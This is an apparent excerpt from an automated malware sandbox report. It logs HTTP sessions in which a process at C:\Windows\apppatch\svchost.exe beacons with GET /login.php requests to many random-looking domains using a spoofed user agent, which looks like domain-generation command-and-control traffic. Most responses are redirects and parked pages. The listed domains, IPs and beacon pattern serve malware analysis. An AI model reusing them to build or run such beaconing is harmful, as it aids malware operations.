                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:11 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3t5qt8ilksvyniCveZ1PXS%2F3HMyU6F2FPu55sQjfioMb0m%2FoQpk62xB4PzZ7eFHTcupRFCjbUnxjCwsswfp0UJ58H2Mz2Kar1vx62VW1i94l5dStQoytAeC1rQlYXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e10069eec26c468-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1241&sent=4&recv=6&lost=0&retrans=0&sent_bytes=972&recv_bytes=486&delivery_rate=2202281&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.176244020 CET173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.997680902 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.347306013 CET974INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:34 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rj01KgpBG8OZgWY3mmqcKGip3rejYHCi5FMgCEkDTw3OdoxIJaHEHrUtmInv2x4uxVZVn2bVTj46onIs7PuoUQdbpj4v2yAwKDetXeEGRhQ1v9rUU1tuMQ88aDs%2BPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e10072fbc21c468-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1287&sent=8&recv=10&lost=0&retrans=0&sent_bytes=1946&recv_bytes=729&delivery_rate=2202281&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.465225935 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.805332899 CET981INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:36 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sdt3rhZ937lWUa%2FpFP2mps9g0Uxja%2BPMKIZudf5LbFfw4Lo7JROh4DO%2FEpjcMx9wxZNucyP%2FdvaFVwTS52dkCpobpUCKtlLEmskILpKxS8IOmPBrzHVcqD5nTBuW%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e10073f2893c468-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1294&sent=11&recv=13&lost=0&retrans=0&sent_bytes=2920&recv_bytes=972&delivery_rate=2202281&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              5192.168.2.849711199.59.243.227807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.374217033 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vojyqem.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.796216011 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:08 GMT
                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                              content-length: 1094
                                                                                                                                                                                                              x-request-id: b5c85606-7b7e-4cde-a75c-fbd25dd3c807
                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                              set-cookie: parking_session=b5c85606-7b7e-4cde-a75c-fbd25dd3c807; expires=Mon, 11 Nov 2024 17:48:08 GMT; path=/
                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.796248913 CET528INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                              Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjVjODU2MDYtN2I3ZS00Y2RlLWE3NWMtZmJkMjVkZDNjODA3IiwicGFnZV90aW1lIjoxNzMxMzQ2Mzg4LCJwYWdlX3VybCI6I


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              6192.168.2.849713178.162.217.107807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.449562073 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyfus.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              7192.168.2.84971475.2.71.199807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.648514032 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.078133106 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Location: https://puzylyp.com/login.php
                                                                                                                                                                                                              Server: Caddy
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:09 GMT
                                                                                                                                                                                                              Content-Length: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              8192.168.2.84971544.221.84.105807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.666512012 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qetyfuv.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.097176075 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:09 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              9192.168.2.849716178.162.217.107807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.871138096 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyfus.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              10192.168.2.84971791.195.240.19807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.952713013 CET271OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: www.gahyqah.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719140053 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:09 GMT
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                              last-modified: Mon, 11 Nov 2024 17:33:09 GMT
                                                                                                                                                                                                              x-cache-miss-from: parking-7596689c44-6sm9t
                                                                                                                                                                                                              server: Parking/1.0
                                                                                                                                                                                                              Data Raw: 38 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 858<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com&nbsp;-&nbsp;gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From g
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719171047 CET1236INData Raw: 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c
                                                                                                                                                                                                              Data Ascii: eneral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719183922 CET1236INData Raw: 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66
                                                                                                                                                                                                              Data Ascii: -style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=re
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719198942 CET1236INData Raw: 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e
                                                                                                                                                                                                              Data Ascii: t-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719211102 CET1236INData Raw: 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 20 61 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63
                                                                                                                                                                                                              Data Ascii: 9494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719223976 CET1060INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 7b 70 6f 73 69
                                                                                                                                                                                                              Data Ascii: ;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719237089 CET1236INData Raw: 63 63 65 73 73 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 78 2d 6c
                                                                                                                                                                                                              Data Ascii: ccess:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719249964 CET212INData Raw: 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 31 70 78 20 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 3a 62 65 66 6f 72 65 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72
                                                                                                                                                                                                              Data Ascii: r{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helve
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719302893 CET1236INData Raw: 74 69 63 61 2c 56 65 72 64 61 6e 61 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 73 61 6e 73 2d 73 65 72 69 66 7d 62 6f 64 79 2e 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 2d 65 6e 61 62 6c 65 64 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d
                                                                                                                                                                                                              Data Ascii: tica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bottom:10px}.container-content{text-align:center;display:flex;position:relativ
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719326019 CET212INData Raw: 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 6c 70 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 37 32 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 72 70
                                                                                                                                                                                                              Data Ascii: px;position:inherit}.container-content--lp{min-height:720px}.container-content--rp{min-height:820px}.container-content--rp .container-content__right,.container-content--rp .container-content__left{background-posi
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.724489927 CET1236INData Raw: 74 69 6f 6e 3a 30 20 34 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d
                                                                                                                                                                                                              Data Ascii: tion:0 40px}.container-content--twot .container-content__left{background-position-y:top}.container-content--twot .container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-position-y:top}.con


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              11192.168.2.84971818.208.156.248807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.034069061 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vonypom.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.403259993 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:09 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=e8a049cc40d6b9d00effb9629f14927b|66.23.206.109|1731346389|1731346389|0|1|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
